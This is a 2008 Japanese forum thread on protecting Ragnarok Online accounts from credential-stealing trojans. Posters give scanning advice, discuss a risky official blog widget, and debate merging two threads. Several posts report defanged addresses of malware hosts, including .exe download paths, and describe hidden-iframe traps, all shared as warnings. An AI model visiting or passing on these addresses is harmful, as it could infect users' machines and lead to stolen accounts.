一応ノートンでスキャンしたところ何もありませんでしたが、上記のようなことってたまに起きるものなのでしょうか?それとも…

最近一部サイトが火狐だと見れなかったり(何故か常時更新される。IEだと閲覧可)するのでちょっと不安になって…。
再インストールが一番とは思いますが、よろしくお願いします。

528 名前:(○口○*)さん:08/05/10 18:57 ID:A4zomGQc0
さっぱりわからん、どうしたらいい?

529 名前:(○口○*)さん:08/05/10 20:03 ID:X6Lrupm50
>>527
何故わざと違ったパスを入れたのか謎ですが

前に、パスワードを3回くらい入力ミスったら、
それ以降“入力→Enter押した瞬間に鯖缶表示”という現象になったことはあるけど、
その時は一旦クライアント落として、少し待ってからクライアントを再起動したら入れるようになった。
(現象が出たのはサブPCで、メインPCはログイン出来ていたので鯖落ちということではなかったはず)

何回かミスったらログインを弾くようにするという仕様があるのかと思われるけど、
1回ミスでそういう現象が出たことはないかな(クライアントの誤認識?)

気になるなら再インストが一番かも。
最終的な判断はご自身で。

尚、火狐の件は使ってないので何とも言えません。

530 名前:まとめ臨時 ◆kJfhJwdLoM:08/05/10 20:14 ID:W5l7IrpB0
>>526
突っ込みありがとうございます。除外リストの機能があるのですね。
幸い資料室さんのほうでは削除分も更新履歴に記載されますので、
残骸分は要らないなあと言う方の場合はそれを使用してもらうということで…。

>>527
あいまいすぎるので私見で。

一回目は単にログインサーバーが重かっただけかもしれませんし、
二回目と三回目の件は何回かログイン失敗した後で、
リターンキーの決定でログインしようとすると
「サーバーからキャンセルされました」と表示される事があるみたいです。
(loginボタンをクリックなら起こらないみたい?
 厳密にチェックしたわけではないのであまり信頼性がないです)

とりあえず現状普通にログインできるのであれば問題ないと思われます。

ウイルスとか何かの可能性を疑うのであれば
テンプレ >>1-7 熟読の上
カスペルスキーオンラインスキャンでフルスキャンしてみて、
それでウイルスの可能性がないのであれば
"ROアカウントハック報告スレのまとめサイト"等を読んで
PG2を導入してPG2が変な所をブロックしていないか確認してみてください。

気になるのは一部サイトが見られないとの記述ですが
見ようとしている、常時更新される場所がどこなのか書いていないので
今ひとつ的確なレスが返ってこないように思われます。

531 名前:(○口○*)さん:08/05/10 22:58 ID:XRpdAeRmO
返信ありがとうございます。

わざと違うパス入力したのは以前どこかのブログかスレでアカハックされた方が「パス入力後すぐにサバキャンになった」と言っていたので、なんとなく初回は違うパス入力をしています。それで今回自分もサバキャンになったのでカキコさせていただきました。

一部サイトとはラグナ関係ではRoratorioやRO2です。またラグナ関係ではない一般サイトも同じ現象が起きました。(現象が起きるサイトではIEでは閲覧可。また右クリックでタブで開く場合も閲覧可)特にPG2は反応してかなかったと思います。
詳しく書きますと
RO2ではトップページは開けるものの、左のモンスター情報などをクリックしてもページが飛ばずにトップページに戻る
ある一般サイト(PDFファイル)は常時更新で繰り返し同じページを開こうとして表示されません。
分かりにくかったらすみません;;
帰宅後カスペルスキーをやってみます

532 名前:(○口○*)さん:08/05/11 01:09 ID:Bbsasygc0
別ゲーですが、FPSのWarRockというFPSーと、あと同じ会社の別ゲーの公式サイトがクラックされ、
トロイが仕掛けられたそうです。
ちなみにこのWarRock、去年も5月に公式がクラックされたことが・・

533 名前:(○口○*)さん:08/05/11 03:44 ID:c0oPRYV0O
最近はカスペも微妙になってきたからほかのメーカーでもスキャンしたほうがいい

534 名前:(○口○*)さん:08/05/11 12:33 ID:HLQa104d0
>>533
Kasperskyの他っつーとAntiVirくらいしかないけどね。

535 名前:(○口○*)さん:08/05/11 12:51 ID:HLQa104d0
>>532
www■ririwow■cn bbs■jueduizuan■com
→ www■bluell■cn/ri.exe dj■jueduizuan■com/ri.exe
ttp://www.virustotal.com/analisis/9c675a56d3c8dfef9b72c80d8577b76c

536 名前:(○口○*)さん:08/05/11 12:51 ID:mM9Xdi4o0
>>533
○○は微妙 と言うなら、理由まで書くもんだぜ。
プロアクティブディフェンスが重たいとか、理由はあるだろ。

カスペに限らず、複数のエンジンで確認する方が安全性が高い(PCの能力が余計に必要)なのは当然だが。

537 名前:527:08/05/11 12:57 ID:caj4vjqcO
昨日はありがとうございました。

一応Cドライブをフォーマットして入れ直しました。
しかし再びソフト入れ直してたらまたサイトが見れない現象が起きて、もしかしてskypeかなとアンインストールしたら正常にサイトが見れるようになりました

538 名前:(○口○*)さん:08/05/11 13:05 ID:HLQa104d0
なんか勘違いしてそうだなぁ

539 名前:(○口○*)さん:08/05/11 18:44 ID:mM9Xdi4o0
>総合スレ9-664
雑談はセキュスレに移動しろってばよー
そんなことやってっと誘導BOTが動きだしちまうじゃねーか

540 名前:(○口○*)さん:08/05/11 18:53 ID:/MUlVl3K0
「アカウントハック総合対策スレ」だからなあ
「対策」と入ってれば対策について話もしたくなるだろう
いくらテンプレに
>一般的なセキュリティ対策・相談・雑談はLiveROの雑談スレ(通称 セキュスレ)を利用して下さい。
とあってもな

次スレ立てる時は
「アカウントハックアドレス収集スレ」
にでもしてほしい

541 名前:(○口○*)さん:08/05/11 19:07 ID:J/SSaMba0
向こうは次スレ要らんと思うが。
全部このスレでやればいいんじゃね?

542 名前:(○口○*)さん:08/05/11 19:17 ID:L5P0zASf0
同意、なんて名目でスレ立ててもあの誘導中は消えないと思うぜ
こっちで全部請け負った方が楽、というか現状そんな感じだし

543 名前:(○口○*)さん:08/05/11 19:17 ID:/MUlVl3K0
予防・駆除・事後連絡
役に立つのはどう見てもこっちのスレだしな
向こうは秋ぐらいまで次スレ立たなさそうだし

個人的には、こっちはRO板に移してもいいような気がする
なんで蓄積されないらいぶろなんだと

544 名前:まとめ臨時 ◆kJfhJwdLoM:08/05/11 20:02 ID:m4cMuFaK0
bluellでググると
まったく関係なさそうなカメラ販売店?とかが上位にあったり。
クラックされているのかなあ…とか。

>>532 >>535
jueduizuan、ririwow、bluellをリストに加えました。

545 名前:(○口○*)さん:08/05/11 20:37 ID:fDokFImD0
アドレス収集だけなら、わざわざスレでやる必要はないしな。逆にリスクもある。
向こうのスレは、1スレが出来た当時と状況が変わり過ぎて、そろそろお役御免でも良い希ガス。

>>543
RO板だから蓄積される、LiveROだから蓄積されないという考え方も、決して良いとは思えないな。
それだけだと、MMOBBSに役目を押しつけ過ぎ。
このスレがLiveROに別建てとなったのも、当時★持ちの手が回らなく、次スレ移行遅延が多かったのも無関係ではないのも含め。
RO板のログが最終的に保存されていたragcanも、廃止された結果古いログは大幅にロストしているし。
重要なのは、個人やまとめサイトでのdat保存になるかと。


そしてWarRock公式改竄の話。
ttp://www.lievo.jp/03news/news_detail.asp?spage=300
ttp://www.lievo.jp/03news/news_detail.asp?spage=301
>・共通の告知システムを利用しているコンテンツサイトが改竄され、
> 告知文に中国の悪意のあるサイトへのダウンロードリンクが挿入された。
中国名指しで記述される告知内容。こんなところでもチャイナリスクの増大が目に見えてきた訳で。

おまけ↓
341 名前:既にその名前は使われています[] 投稿日:2008/05/11(日) 16:06:21.05 ID:ph4QmOBI
罠カキコ掲示板の中華:yh33dddがここ数日の間にあちこちのゲーム以外のサイト、
コミュニティ等に潜入したのをGoogle検索で確認。
先日はFC2ブログのユーザーフォーラムにウィルスリンクを多数書き込んだ。
MSDNフォーラムにもこの名前で潜入、ウィルスリンクを記述している
ttp://forums.microsoft.com/MSDN-JA/ShowPost.aspx?PostID=3248358&SiteID=7
気をつけてくれよな!

546 名前:(○口○*)さん:08/05/12 07:59 ID:An08lB8R0
ハクスレの方、スレスト依頼&統合スレ建ての依頼でもした方がいいのかねぇ?
是非スレで聞いた方がいいのかな?

547 名前:(○口○*)さん:08/05/12 08:21 ID:164nzibb0
是非スレの前にはまず該当スレでの話し合いが必要。
こっちでの結論も出てない状態でスレ見てない板住人を巻き込んでも仕方ない。

個人的な意見としてはこのスレがRO板にあれば十分。
だけど向こうのスレを無くす事に反発する人も居るだろうから
公知書き写すスレと突っ込みスレのような関係になるのが無難だと思う。

548 名前:(○口○*)さん:08/05/12 08:24 ID:QUUWDs370
>該当スレでの話し合い

そんなことしたら速攻で「重要な(ry」と「nice bot.」が湧くのが手に取るように見えた…

549 名前:(○口○*)さん:08/05/12 08:44 ID:XkMaAnwM0
一回向こうで書いてみて重要な〜とか言ったらこっちで勝手に決めちゃえばいいじゃない

そうすればここで出した結論が向こうとこっちの統一意見って事になるわけだし
向こうで話し合いに乗ってくるならそれはそれで問題ないわけだし

それとも先にこっちの結論を出しちゃってから向こうに書いた方が楽かな?

550 名前:(○口○*)さん:08/05/12 08:48 ID:164nzibb0
それについては以前にも書いたことあるよ……。
スレの運営自治に関して自スレ内で話し合いが出来ないなんておかしいだろと。
2つのスレは立ち位置の違う別スレなんだから、本来向こうの自治は向こうで話合うべきなんだよな。
とりあえず546の投げかけに対してのレスだし、重要な(略を釣るつもりもないからこっちに書き込むけど。

551 名前:(○口○*)さん:08/05/12 09:06 ID:CTHEVXtC0
あのスレを利用している(検体報告とかやってくれている)人の意見も聞いてみたいところだな
個人的には検体報告は埋もれやすいから別で、というのも分かるし
ただあそこにある必要はない
アンチウイルスベンダーに報告してしまえば検体報告はいらないし
(結果報告はいるだろうが、元は取ってあるはずだから過去のレスはあえて不要)
スレが落ちたら都度立てればいい内容
むしろスレ落ちするぐらい利用がない方がいいんだろうな

向こうは事例報告しか許さないようになってしまっているから
ちょっと話を振ってみて、重要な(ryが来たらこっちで話をまとめてしまえばいい
自分たちの存在意義についての話さえ雑談として許さないなら
自治は無理だろう
それが出来るなら両方である程度話し合って是非スレ移行、
出来なければこちらである程度結論出して是非スレ移行

552 名前:(○口○*)さん:08/05/12 10:14 ID:HcevU4aq0
ハクスレ2ぐらいから常駐してて、urlチェックが主、極まれに検体チェックで報告してる身として。

専ブラ使ってるからってのもあるが、どちらも同時に巡回してるしスレがどちらの板にあっても
気にならないが、今のハクスレは機能不全にさせられてるし統合に賛成。

統合前提として、どちらの板に置くかと考えた場合
-RO板
--全般を取り扱う場合は板違いの可能性有り
--是非スレで了承を得る必要があるが、nice bot.の妨害が来る可能性有り
--職スレがある関係上、割と安心して板みる人が多い(らしい?)
--dat落ちせず、多少過去スレが見やすい
-LiveRo
--板違いにはなりにくく、融通が利くので即建てる事も可能
--LiveRoを嫌う人もいる(らしい?)
--dat落ちするぐらい過疎る方がスレの性質上望ましい
--過去スレを見る必要が実は薄いので、ログ保存はそんなに重要ではない

そもそもセキュスレが出来た経緯ってのは、ハクが激しかった時期に雑談系の話題で
スレが流れてしまい、危険アドレスの情報を見落としやすくなったのと全般ネタをやると
板違い気味になって来たから。
(WUの話なんかもハクスレでやってたが、FWだのなんだのの話になるとRO板の範疇を
超えた話題になりがちだった)

板違いの問題がないならRO板、あるならLiveRoじゃないかな。
手続き的なものやら何やら手間考えると、LiveRoの方がいい気がしてるけど。

553 名前:(○口○*)さん:08/05/12 12:25 ID:J8sL+PS30
>是非スレで了承を得る必要
垢ハクスレでテンプレ変更議論→賛成多数で了承を得る
→新テンプレでスレ立て依頼
という流れだと思うよ。

新規スレとして是非スレに持ち込んでも
「既存スレ(垢ハクスレ)との重複」で反対が起きるだろうし
統合スレという目的である以上はそれに対して筋通すことはできないからね。

554 名前:(○口○*)さん:08/05/12 12:33 ID:H3fB1Bet0
向こうのスレに重要な〜がいなければしっかりとした話し合いが出来ると思うんだがな……
荒らしもいいとこだろあれ

個人的な見解としては、
情報が流れてしまう問題はわからんでもない
が、見落とすほどに荒れたりレスが続くかといわれるとそうは思えない
こっちに報告されて向こうに反映されない情報もあるわけで情報の片手落ちはよろしくない
統合の検討はすべきだと思う

555 名前:(○口○*)さん:08/05/12 12:34 ID:QUUWDs370
検体報告する人はコテ酉付ければいいんじゃね
それ抽出すれば「重要な(ry」が参照できるだろ

556 名前:(○口○*)さん:08/05/12 13:38 ID:CTHEVXtC0
>>553
うん
だから、向こうで自治が出来るのかって話
テンプレ変更議論すらこっちに持ち込まれそうじゃない?
重要な(ryを荒らしとしてスレ住人で排除できるならいいんだけど
それが分からないからどこでどう話をしようかと言ってるのだと思った

557 名前:(○口○*)さん:08/05/12 13:50 ID:nbJ4k4Do0
★でもないただの名無し相手にスレが振り回されてておもしれーw
相手からすればちゃんと自治をしているつもりだろうよ

558 名前:(○口○*)さん:08/05/12 14:11 ID:J8sL+PS30
>>556
是非スレに持ち込むべきではないっていうのが趣旨だったんだけど
とりあえずその部分はおk?

テンプレ修正議論に誘導レスされてもそれはスルーでいいんじゃないかな。
該当スレで議論するのが筋だし、誘導レスが酷いならかえって
削除依頼する正当な理由になる。
そもそもテンプレ議論はこれに該当しないしね。
>一般的なセキュリティ対策・相談・雑談はLiveROの雑談スレ

もっともそれはRO板で統合する方向性になったときの話で、
まだ方針すら定まらない現段階ではここでいいと思う。
あくまで、是非スレに持ち込むような話にまでこぎ着けたら
垢ハクスレがいいってこと。

ただ、LiveRO側で統合って話になったときにRO板垢ハクスレを
どうすればいいのかはわからない。
是非スレは(少なくとも現時点では)スレ廃止を議論する場でもないし
かといって板のトップに誘導リンクがある以上は放置もできない。
管理板行きになるのかな・・・?

559 名前:(○口○*)さん:08/05/12 14:21 ID:J8sL+PS30
ごめん、リンクはこっちになってたね。
それならLiveRO側統合の話になったら放置(関与せず)でよさそう。

560 名前:(○口○*)さん:08/05/12 14:33 ID:XkMaAnwM0
>>558
その場合、垢ハクスレについては管理人さんにスレスト依頼をすればいいんじゃない?
誘導を一言だけ書き込んでおけば放置しておいても問題はなさそうな気もするけど

これを書いてる時に改めてみてみたらTOPからリンクを張られてるスレって垢ハクスレじゃなくてこのスレなんだね
垢ハクスレは情報を得るという点では本当に要らないんだな

とりあえず、今も前スレへのリンクになってるしTOPの更新は何か対策を考えた方がいいかもしれない・・・
よし、ここはひとつこのスレの中から誰か一人管理人さんに立候補するんだ!

561 名前:(○口○*)さん:08/05/12 15:06 ID:GlvYeIRL0
>>560
セキュスレが更新されたら、管理スレの目安箱に投稿すれば書き換えてくれるよ。
前も、そうやって修正お願いしたし。

562 名前:(○口○*)さん:08/05/12 15:28 ID:GlvYeIRL0
MMOBBS目安箱2
http://zaurak.mmobbs.com/test/read.cgi/manage/1164226754/154

|154 (>▽<)さん sage 08/03/20 23:47 ID:O718UGX00
|アカウントハック総合対策スレ
|>アカウントハックに関する情報の集積・分析を目的とするスレです。
|>被害や攻撃等のアカウントハックの具体的事例に関して扱います。

|セキュリティ対策、質問・雑談スレ
|>・ウイルスソフトやスパイウェアチェックソフトなどの一般的な質問。
|>・アカウントハック対策に関しての討論など。
|>・セキュリティ関係の最新情報、ニュースなど。
|>・アカハックを踏んでしまった/アカハックと関係のないものを踏んでしまった時の相談

|こんなアカウントハックがあった、なら前者、
|ではどうするかとかセキュリティ関連の話題なら後者
|前者は研究室、後者は会議室・教室
|学術的研究にとどめるべきだという人と、広くセキュリティ意識を高めてもらおうという人とで
|意識のずれが見られるんじゃないかと思う
|実害のあった事例についていちいち移動するのかという考え方も出来るしね
|セキュリティ情報をらいぶろに埋めていていいのかという懸念も分かる

|テンプレ見直しすらしづらい雰囲気なので、話し合うならセキュリティスレで

テンプレ変更のことって、結構前に、話題に出てるんだよなー

563 名前:(○口○*)さん:08/05/12 20:02 ID:TfYn3UNn0
スレの位置付けの明確化を目的としたテンプレ改定は何度も案として
上がってるが、スレの位置付けは今のままでいい、テンプレも変える
必要はない、と言い張る人も居て全然進まず、2スレぐらい進んでる。

セキュスレ的には今のところ統合に賛成する声が主だが、その場合板は
どちらがいいと考えてる?

個人的には>552の言うようにRO板だと板違いの部分があると思うから
LiveROの方がいいと思うんだが。

564 名前:(○口○*)さん:08/05/12 20:27 ID:GlvYeIRL0
RO板に持ち込むのは無理だろう。一般的話題は板違いだから。

ぶっちゃけ、体験談の報告が、RO板に移動すればそれで十分なんだけどな〜

当初、スレ分割した時の予想ほど、まとめてRO板にフィードバックする作業をする人がいなかったのが
総合スレ不要案の根底にあるんだろうね。

565 名前:(○口○*)さん:08/05/12 20:38 ID:J8sL+PS30
>>564
>一般的話題は板違い
そこはLiveROも大差ないよ。

>MMORPG「Ragnarok Online」(以下RO)に関する話題を取り扱う匿名掲示板です。
>LiveRO板はRagnarok Onlineに関する話題の掲示板です。

だからRO板がダメならPUB行けってことになると思う。
専ブラ促進のスレがRO板にあることだしあんまり気にしなくていいんじゃない?

566 名前:(○口○*)さん:08/05/12 20:39 ID:9P1KBmSe0
全てを板で完結させようという事自体が、無理があると思う気がする。
こちらのスレに書かれた体験談を向こうに転記しても、やはり一過性の記述になってしまうから。
本来、そういうのはWikiやまとめサイトの領分だと思うのだけどな。

向こうのスレで現在機能している、不審サイトのURL掲載にしても、ノイズが増えたり、増やされたりしたらやっぱり調査の手間が増える訳で。
それこそ、業者が意図的にハックとは無関係のアドレスを爆撃して、妨害してくる可能性だって考えられる。
そういった場合の対処を、★持ちだけに投げてしまうのもどうかと。

567 名前:(○口○*)さん:08/05/12 22:41 ID:LFsnUrdc0
パーティー設定 - 経験値の分配方式 : 各自で取得
○○: ウィンドウが次々と
○○: でてくるやつ
○○: なっちゃってさ
××: エロサイトでもみたの?
○○: ちがうよ・・
△△: おつかれさまー(゚ω゚*)
△△: おやくそくのー
○○: ROの公式サイト
○○: みてて
○○: クリックしたら
○○: でてきて
○○: びっくりした・・
取引ができました。
赤ハーブ 6 個獲得
食人植物の根 3 個獲得
食人植物の花 4 個獲得
ベトベトな毒 6 個獲得
かまきりの手 33 個獲得
乾いた砂 16 個獲得
ドロの塊 11 個獲得
ハリネズミの針 2 個獲得
獣の皮 1 個獲得
エメラルド 1 個獲得
××: 公式でも
速さが減少しました。
ブレッシング状態が解除されました。
××: 信用したらだめw


というログが取れたんだけど公式サイトって危ないです?

568 名前:(○口○*)さん:08/05/12 22:45 ID:GlvYeIRL0
他ゲームの公式サイトに、罠が仕込まれて中国の危険サイトに接続するようになった事例は存在する。
だが、それとブラクラは別物。公式の他に、ブラクラ仕込まれてるどこか踏んでたんだろ。

569 名前:(○口○*)さん:08/05/13 10:07 ID:cZQtvkY6O
以前忍者ブログを作成したとき、QRコードの部分にリンクなんてつなげてないのに、なにかつながっていたようでクリックしたらブラクラだった事がある。
あれは一体…

570 名前:(○口○*)さん:08/05/13 11:36 ID:qlcwVDtb0
この手のスレに書くなら、もー少し落ち着いて情報を
揃えて欲しいかなぁ。そうでないなら、愚痴スレチラ裏スレとか。

571 名前:(○口○*)さん:08/05/13 15:12 ID:PM7UqPyR0
向こうのスレに書くと多分また例のが出てくるからこっちに

なんか福建竜安も久しぶりに見たなぁ……

572 名前:(○口○*)さん:08/05/13 16:42 ID:3myvFwcF0
使い分けわかってなくて、垢ハクの方に書いちゃったことなんだけど

新しいブログパーツって、パーツ貼ってるところにランダム訪問だから、
罠blog踏んじゃう可能性高くなって危なくないかなって、思いました。

573 名前:(○口○*)さん:08/05/13 17:50 ID:LUduKEei0
飛びまくってしまった 俺はもうだめかも試練

574 名前:(○口○*)さん:08/05/13 17:53 ID:ur/QvIyB0
FlashPlayerが更新されてる(9.0.124.0)。IEは
ttp://www.adobe.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash
を踏めばよい。他は知らん。

575 名前:(○口○*)さん:08/05/13 17:54 ID:u8ZeN/4E0
まぁ俺も飛んだが……
なんかやけに新しく作られたブログが多いんだよな
サクラならまだいいが垢ハックブログの可能性もありえそうではある

576 名前:(○口○*)さん:08/05/13 18:15 ID:6MJB2Sv40
どこのblogパーツだか知らんが、好きに踏んで自滅しとけ。

577 名前:(○口○*)さん:08/05/13 18:19 ID:qlcwVDtb0
どこのって、キミは何の板に来てるつもりなんだい?

www.ragnarokonline.jp/rofan/blog_parts/index.html

578 名前:(○口○*)さん:08/05/13 19:15 ID:6MJB2Sv40
>>577
>>570で言ってることと矛盾してると気付け。ろくに情報も出さない奴に対してまともな応対しちゃだめだ。
相談用テンプレも埋めない奴は、冷たくあしらっておけ。

579 名前:(○口○*)さん:08/05/13 19:52 ID:3myvFwcF0
>>572です
よく説明もなしに話題出してごめんなさい。

>>577さんが教えてくれたアドレスでも見れるけど、
今日から配布が始まった、ROの新しいブログパーツの話です。

時計機能と、ブログパーツを貼ってるブログにランダムで飛べるボタンがついてるんだけど、
そのランダムで飛べるシステムだと、飛ぶ先のアドレスを確認できないから、
最近増えてる罠blogとか、下手すれば普通の罠サイトにだって
簡単に飛ばせるんじゃないかって思いました。
ブログパーツとはいえ、サイトに貼ることも十分可能だからね。

貼り付けるのは構わないけど、飛ぶときは注意したほうがいいんじゃないかな、
って言いたかったので書き込みました。

580 名前:(○口○*)さん:08/05/13 20:03 ID:sjdSVBnU0
もっと言うとこれだな
ttp://www.ragnarokonline.jp/rofan/blog_parts/weblink.html
>gooブログでのブログ開設を記念!
>公式ブログで使用しているイラスト使った、ブログパーツです。
>「ラグナロクオンライン仲間のブログへ飛ぶ」をクリックすると、
>同じパーツを使用している人のブログにランダムで行くことができます。
>時計機能付きで、イラストは全17種から選べます!

ちなみにスクリプト本体はガンホーの鯖内

581 名前:(○口○*)さん:08/05/13 20:09 ID:fgaLe2k/0
>579
既にあちこちで言われてるけど、罠Blogに飛ばされる可能性は十分ある。
なんせ貼り付けるだけでいいんだから、中華お得意のコピペした罠ページを作って
そこにパーツを張っておけば、そのうち誰かが踏んでくれるわけだし。

>飛ぶときは注意したほうがいいんじゃないかな
注意するも何も、Webリンクで罠Blogに飛ばされた場合、手遅れとなるわけで。

仮に癌が神管理を行ってその辺りに飛ばさないように対策を講じたとしても
対策までのタイムラグを考慮すると、絶対に安全とは言えない。
ましてや紙管理な癌の運営を考えると……

結局「クリックするな・飛ぶな」しか自衛策は無いんじゃないかな。

582 名前:(○口○*)さん:08/05/13 20:14 ID:fyr/XE9U0
Adblock Plusマジオヌヌメ

アカハック罠以外にも、アフィやフィッシングに転用される事も考え得る範囲だし、現時点では触らない方が賢明か。
後は、クッションページを導入するように、投稿フォームから投げ続けるべきか。

583 名前:(○口○*)さん:08/05/13 20:59 ID:6MJB2Sv40
システム的に、そのBlog内に、iframeタグが置けるかどうかとか、カーソル変更の設定があるかどうかなど
Blog自体の脆弱さがあるかどうか調べないとなんとも。

危険なサイトに飛ばされる「可能性が0ではない」ことだけは言える。
「露骨に心配する程度かどうか」については、一般のサイトやBlogを訪問する時と同じような危険度でしかない。
(そこに何が置かれているか事前にはわからないという意味で)

事前にソースチェッカーオンライン等で確認するのが困難という意味では、自衛が取りにくいとは思う。

自衛するのであれば、積極的に、ダウンローダやスクリプトの遮断を行なっているセキュリティソフトに
頼るしかないのが実情。個人的には、AntiVirのスクリプトへの対応の幅広さには注目している。
カスペは報告数次第。報告があれば対応する感じで、検体の提出がない新パターンは結構すり抜ける。
NOD32(ESS)は、ダウンローダ系はすり抜けさせて、本体をブロックする趣旨のようで、提出しても対応は
あまり進んでいない。(その分、ヒューリスティックスキャン入ってても軽い訳だが)

584 名前:(○口○*)さん:08/05/13 21:38 ID:EKatEIqJ0
確かに危険度は同じだが、影響という点ではWebリンクは大きい。
同じコミュニティを見に行く(しかも内容は不明)で、罠リンクのような
特徴ある警戒心を起こしにくい。
というか、油断しがちになるので、踏む率は罠リンクより大きい。
(どこまでパーツが普及するかという問題はこの際置いてる)

クリック時の警戒が意味を為さないので、スクリプトOFFやPG2、hosts変更と
いった、ある種アクティブな対策をしないと危険。
で、この手のコミュはその手に弱いケースもままある。

やっぱり飛ぶなクリックするな、が正解としか思えないな。

585 名前:(○口○*)さん:08/05/13 23:03 ID:5ATbsKXu0
アカハック注意、ってまがりなりに注意してる公式が
アカハックURLに飛ばないようにする対策=そのブログパーツを使わない
になるブログパーツを用意するってどういうことだ・・・

586 名前:(○口○*)さん:08/05/14 04:17 ID:SSbZGnph0
>>574
9.0.124.0って、もう3月頃には更新されてたよ。

587 名前:(○口○*)さん:08/05/14 09:23 ID:ljs1A7MT0
WindowsUpdateの日だぞ〜

588 名前:(○口○*)さん:08/05/14 18:15 ID:WbYtj5jC0
緊急(3) 警告(1)
ttp://www.microsoft.com/japan/technet/security/bulletin/ms08-may.mspx
OfficeやLive Onecare、Jetデータベースエンジン絡みのKBなので、影響の無い人も多いかも。

589 名前:(○口○*)さん:08/05/14 20:25 ID:thAWjCom0
ウィンドウズが再起動を繰り返して困ってます
ウィルスですか?

とかそういう質問はまだないのかな?

590 名前:(○口○*)さん:08/05/14 20:42 ID:S0/wfPV10
XPのSP3入れた一部環境で発生するとかいうあれか。AMDだけど発生しなかったなぁ。

591 名前:(○口○*)さん:08/05/14 20:49 ID:ljs1A7MT0
>>598
セキュリティと関係無いからね。
メーカのサポセン、教えてgoo、答えてねっと、OKWave、2ch、お好きに。

592 名前:(○口○*)さん:08/05/14 20:50 ID:ljs1A7MT0
>>589 だった。

593 名前:(○口○*)さん:08/05/15 00:05 ID:0kzzaiYo0
Fujisan.co.jpがサイト改竄、SQLインジェクションでウイルス仕込まれる
ttp://internet.watch.impress.co.jp/cda/news/2008/05/14/19543.html

594 名前:(○口○*)さん:08/05/15 16:04 ID:rbQ/QOxt0
アカハックマジ怖い

これまで一度も踏んだことが無かったから気の緩みがあったんだろうが
スキャンしてみたら発見、その日はROのサイト一切行ってないんだが
なんか防衛する自信なくなってきた・・・

595 名前:(○口○*)さん:08/05/15 16:15 ID:MaigzpJ30
垢ハックだけならまだいいさ
垢ハックが仕込めるなら他のスパイウェアも仕込めるわけで

ちなみに最近の流行は無差別散布
ゲームなんてしないとか言って油断してる人を踏み台にする

596 名前:(○口○*)さん:08/05/15 18:50 ID:0m+wixl80
BitDefender、ネットゲーム利用者専用のセキュリティソフトを発表
ttp://internet.watch.impress.co.jp/cda/news/2008/05/15/19565.html
うーん…。

597 名前:(○口○*)さん:08/05/15 18:53 ID:7TK7O+uw0
ただ単に「ゲームしてるときは大人しくしてます」ってだけみたいだね
今でも自動アップデートやらスキャンは使う人間の設定次第では

598 名前:(○口○*)さん:08/05/15 18:54 ID:0m+wixl80
うん。だから微妙だなぁと。

>>593
スキャン
ttp://www.virustotal.com/analisis/9c675a56d3c8dfef9b72c80d8577b76c
たぶん提出済み。

599 名前:(○口○*)さん:08/05/16 13:50 ID:DbONPhyW0
Wiki活用例
ttp://rosafe.rowiki.jp/index.php?MMOBBS%A5%B9%A5%EC%A5%C3%A5%C9%A4%CE%BA%A3%B8%E5

600 名前:(○口○*)さん:08/05/16 14:41 ID:8AdZdQgg0
>>599
>Wiki活用例
ただの例なのか、投票に持ち込みたいのかよくわからないけど
安易に投票(というかアンケート)へ走るのもどうかと。

というか「LiveROへの統合」の賛成的意見は聞くけど
明確な反論やそれ以外を支持するレスってあったっけ?

601 名前:(○口○*)さん:08/05/16 15:46 ID:CbW4QXNv0
>>600
危険アドレスの報告以外に、体験談の投稿が総合スレに移動したら、そのままでいいんじゃないかって
意見なら出した気がする。無理にどっちか消す事もない。

過度の誘導については、総合スレのテンプレに一言注意を入れときたいところだが、潰す必要はないかと。

取り敢えず、アンケートしようって意見に賛意が出た訳じゃないうちにやっちゃうのはどうかと。
>>599のリンク先のコメントにあるように、多重投稿できるし、アンケートはやめた方がいいと思う。

602 名前:(○口○*)さん:08/05/16 21:58 ID:bBkdjN930
なにかの予防になるかとROのIDとPASS、ガンホーIDとPASSの入力を
クッキー等で保存せず、毎回手入力をしているのですが、もしも垢
ハックのウィルスなどにかかっていた場合、そういった保存しない
手入力のものも読み取ってしまうものなのでしょうか?

知らないうちに感染してたらと思いこの入力を続けていたのですが、
まとめページなどを読み進めていたら果たして有効なのかと不安に
なってしまって…

素朴な疑問なのですが、お答え頂けたら嬉しいです。

603 名前:(○口○*)さん:08/05/16 22:08 ID:r0zIn8610
>>602
使っているパソコンが他の人も使うことがあるなら、有効だと思います。
ログイン画面に残っているIDを読み取られないという意味では。

キーロガー(キーボードから入力した内容を送信する)が仕込まれている場合は
無意味になります。

604 名前:(○口○*)さん:08/05/16 22:46 ID:CbW4QXNv0
>>602
アカハックトロイが発動中なら、入力した時点で読み取っているので、無駄。

クッキーや、AIroboformのようなパスワード管理ソフトへの保存をしていないとしても
あんまり意味はありません。それは、そのPCを他の人がいじった時に直接盗まれるかどうか
の問題でしかなかったりします。

アカハックトロイを踏まないこと、発動させないこと、削除すること。その基本を忘れずに。

605 名前:602:08/05/17 00:41 ID:+lHVq62p0
入力した内容を送信するようなものもあるのですね…
603さん604さん、お答えありがとうございました!

606 名前:(○口○*)さん:08/05/17 00:54 ID:uJliC+eg0
【      気付いた日時          】08/05/10
【不審なアドレスのクリックの有無 】 ブログのコメントを誤って踏む
【  アドレス   〕http://yaplog■jp/lmhtmy
【     OS    】XP Pro SP2
【使用ブラウザ 】 firefox 2.0.0.12
【WindowsUpdateの有無】 2週間前ほど
【 アンチウイルスソフト 】avast!
【その他のSecurty対策 】 ADaware
【 ウイルススキャン結果】 Avast検出なし。カスペオンラインでも実行したが検出なし。
DrWebのオンラインスキャンでもスキャン。検出無し
【hosts変更】無
【PeerGuardian2導入】無

全く同名のブログがあり、罠のほうを踏んだ(私が踏んだほうの更新が少しだけだった)
と思いスキャン。
結果、何も出ず。

ソースチェッカーで見たところ、iframeがあり
URLをaguseでチェックしたところ、中国。
やられたかと思ったけど、移動先にはなにもない・・・

これは私のソースチェッカーの見方が悪いのでしょうか?
もしトロイがある場合にはソースチェッカーではどのように表示されるのでしょうか?

色々自分なりに調べてみましたがわからなかったため教えていただきたいと思います。

607 名前:(○口○*)さん:08/05/17 02:02 ID:wfo8zgnT0
tinyurl(短縮URLサービス)を使った、iframeでサイズ0の典型的な罠だが
飛び先が何も無い感じ。

中華は時々書き間違いのミスやるが、今回のケースは多分tinyurl側が
削除したと思われる。
(>510のtinyurlも、今現在は同じようにデリられてる)

なので、多分、無害。


>もしトロイがある場合にはソースチェッカーではどのように表示されるのでしょうか?
既知の場合は危険アドレスと出る場合もあるが、大抵はソース見て判断。
一例を挙げると、ハクスレ669で報告のあった www■lyjpyx■com/boy/ とか
